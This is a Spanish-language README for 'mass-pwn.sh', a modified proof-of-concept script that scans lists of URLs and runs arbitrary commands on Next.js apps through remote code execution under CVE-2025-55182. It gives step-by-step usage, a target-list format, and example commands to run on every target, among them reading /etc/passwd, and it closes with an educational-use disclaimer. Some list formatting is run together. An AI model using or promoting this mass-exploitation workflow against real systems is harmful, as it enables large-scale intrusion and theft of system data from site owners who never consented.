
CVE-2025-55182 carga útil
Un script modificado de explotación RCE masiva para CVE-2025-55182 (React2Shell) dirigido a aplicaciones Next.js.
Esta herramienta es una modificación del script PoC original de pax-k. Mientras que el script original ataca un único host, esta versión está mejorada para soportar escaneo masivo desde una lista de URLs, automatizando la inyección de cargas útiles, la ejecución de comandos y el análisis de salida para una evaluación eficiente de vulnerabilidades.
list.txt).curl, openssl y utilidades estándar de bash.Un gran agradecimiento a los investigadores de seguridad y equipos que descubrieron esta vulnerabilidad:
Asegúrate de tener un entorno Linux (Kali Linux, Ubuntu, etc.) con lo siguiente instalado:
bashcurlopensslgrep y cutClona o descarga el script.
Haz el script ejecutable:
chmod +x mass-pwn.sh
Crea un archivo de texto (por ejemplo, list.txt) y agrega tus URLs objetivo línea por línea. Asegúrate de incluir el protocolo (http:// o https://).
nano list.txt
Format:
Plaintext
[https://target-one.com](https://target-one.com)
[http://vulnerable-site.net](http://vulnerable-site.net)
[https://testing.corp.local:3000](https://testing.corp.local:3000)
Ejecuta el script proporcionando el archivo de lista de objetivos y el comando que deseas ejecutar.
Sintaxis:
Bash
./mass-pwn.sh <list_file> ""
Ejemplos:
Verificar el usuario actual en todos los objetivos:
Bash
./mass-pwn.sh list.txt "whoami"
Verificar el nombre del host:
Bash
./mass-pwn.sh list.txt "hostname"
Intentar leer archivos del sistema (si es vulnerable):
Bash
./mass-pwn.sh list.txt "cat /etc/passwd"
⚠️ Aviso legal SOLO CON FINES EDUCATIVOS.
Esta herramienta se desarrolla y distribuye únicamente para investigación de seguridad, pruebas de penetración autorizadas y fines educativos.
Sin responsabilidad: El autor y los colaboradores NO son responsables de ningún daño, pérdida de datos, compromiso del servidor o problemas legales causados por el mal uso de esta herramienta.
Sin uso no autorizado: No uses esta herramienta contra sistemas, redes o aplicaciones que no poseas o para las que no tengas permiso explícito y por escrito para realizar pruebas.
Consecuencias legales: El acceso no autorizado a sistemas informáticos es ilegal y está penado por la ley. Eres el único responsable de tus acciones y de cualquier consecuencia legal que pueda derivarse.
Al usar este script, aceptas que comprendes estos términos y que no utilizarás esta herramienta con fines maliciosos.